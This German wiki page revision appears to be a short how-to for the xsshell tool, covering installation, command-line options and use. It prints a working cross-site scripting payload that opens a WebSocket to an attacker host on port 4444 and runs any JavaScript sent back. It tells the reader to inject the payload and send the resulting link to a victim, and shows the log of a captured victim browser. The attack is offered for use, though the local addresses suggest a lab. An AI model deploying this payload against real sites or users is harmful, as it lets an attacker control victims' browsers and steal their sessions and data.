Xsshell: Unterschied zwischen den Versionen
Zur Navigation springen
Zur Suche springen
| Zeile 37: | Zeile 37: | ||
=Die Shell= | =Die Shell= | ||
| − | + | ====== start socket: 1, header: AqHFTtA= ====== | |
| − | + | socket connected: 1 | |
| − | + | user agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:90.0) Gecko/20100101 Firefox/90.0 | |
| − | + | page url: http://127.0.0.1/xss.php?msg=%3Cscript%3E%28function%28%29%7Bfunction+e%28a%2Cb%29%7Breturn+function%28%29%7Breturn+eval%28a%29%7D.call%28b%29%7Dvar+d%3Dnew+WebSocket%28%22ws%3A%2F%2F10.82.70.52%3A4444%2Fs%22%29%2Cf%3Dfunction%28a%29%7Bthis.send%3Dfunction%28b%2Cc%29%7Bd.send%28%28c%3F%22z%22%3A%22%22%29%2Ba%2Bb%29%7D%7D%3Bd.onmessage%3Dfunction%28a%29%7Ba%3Da.data%3Bvar+b%3Dnew+f%28a.slice%280%2C8%29%29%3Btry%7Be%28a.slice%288%29%2Cb%29%7Dcatch%28c%29%7Bb.send%28c%2C%210%29%7D%7D%7D%29%28%29%3B%3C%2Fscript%3E&submit=klick | |
| − | + | referrer: http://127.0.0.1/xss.php?msg=%3Cscript%28function%28%29%7Bfunction+e%28a%2Cb%29%7Breturn+function%28%29%7Breturn+eval%28a%29%7D.call%28b%29%7Dvar+d%3Dnew+WebSocket%28%22http%3A%2F%2F10.82.70.59%3A4444%2Fs%22%29%2Cf%3Dfunction%28a%29%7Bthis.send%3Dfunction%28b%2Cc%29%7Bd.send%28%28c%3F%22z%22%3A%22%22%29%2Ba%2Bb%29%7D%7D%3Bd.onmessage%3Dfunction%28a%29%7Ba%3Da.data%3Bvar+b%3Dnew+f%28a.slice%280%2C8%29%29%3Btry%7Be%28a.slice%288%29%2Cb%29%7Dcatch%28c%29%7Bb.send%28c%2C%210%29%7D%7D%7D%29%28%29%3B%3E%3C%2Fscript%3E&submit=klick | |
| + | cookies: | ||
| + | ====== end socket: 1, header: AqHFTtA= ====== | ||
=Auf dem Client= | =Auf dem Client= | ||
Version vom 28. Juli 2021, 12:51 Uhr
git clone
- sudo apt-get install go
- go get github.com/raz-varren/xsshell
- go install github.com/raz-varren/xsshell
start
- ./xsshell -host 127.0.0.1 -port 4444
xsshell -h Usage of xsshell:
-cert string ssl cert file -host string websocket listen address -key string ssl key file -log string specify a log file to log all console communication -path string websocket connection path (default "/s") -port string websocket listen port (default "8234") -servdir string specify a directory to serve files from. a file server will not be started if no directory is specified -servpath string specify the base url path that you want to serve files from (default "/static/") -wrkdir string working directory that will be used as the relative root path for any commands requiring user provided file paths
Payload
- Payload muss ins Eingabefeld
- Generierter Link wird zum Opfer geschickt
JS Script : <script>(function(){function e(a,b){return function(){return eval(a)}.call(b)}var d=new WebSocket("ws://10.82.70.52:4444/s"),f=function(a){this.send=function(b,c){d.send((c?"z":"")+a+b)}};d.onmessage=function(a){a=a.data;var b=new f(a.slice(0,8));try{e(a.slice(8),b)}catch(c){b.send(c,!0)}}})();</script>
Die Shell
start socket: 1, header: AqHFTtA=
socket connected: 1
user agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:90.0) Gecko/20100101 Firefox/90.0 page url: http://127.0.0.1/xss.php?msg=%3Cscript%3E%28function%28%29%7Bfunction+e%28a%2Cb%29%7Breturn+function%28%29%7Breturn+eval%28a%29%7D.call%28b%29%7Dvar+d%3Dnew+WebSocket%28%22ws%3A%2F%2F10.82.70.52%3A4444%2Fs%22%29%2Cf%3Dfunction%28a%29%7Bthis.send%3Dfunction%28b%2Cc%29%7Bd.send%28%28c%3F%22z%22%3A%22%22%29%2Ba%2Bb%29%7D%7D%3Bd.onmessage%3Dfunction%28a%29%7Ba%3Da.data%3Bvar+b%3Dnew+f%28a.slice%280%2C8%29%29%3Btry%7Be%28a.slice%288%29%2Cb%29%7Dcatch%28c%29%7Bb.send%28c%2C%210%29%7D%7D%7D%29%28%29%3B%3C%2Fscript%3E&submit=klick referrer: http://127.0.0.1/xss.php?msg=%3Cscript%28function%28%29%7Bfunction+e%28a%2Cb%29%7Breturn+function%28%29%7Breturn+eval%28a%29%7D.call%28b%29%7Dvar+d%3Dnew+WebSocket%28%22http%3A%2F%2F10.82.70.59%3A4444%2Fs%22%29%2Cf%3Dfunction%28a%29%7Bthis.send%3Dfunction%28b%2Cc%29%7Bd.send%28%28c%3F%22z%22%3A%22%22%29%2Ba%2Bb%29%7D%7D%3Bd.onmessage%3Dfunction%28a%29%7Ba%3Da.data%3Bvar+b%3Dnew+f%28a.slice%280%2C8%29%29%3Btry%7Be%28a.slice%288%29%2Cb%29%7Dcatch%28c%29%7Bb.send%28c%2C%210%29%7D%7D%7D%29%28%29%3B%3E%3C%2Fscript%3E&submit=klick cookies:
end socket: 1, header: AqHFTtA=
Auf dem Client
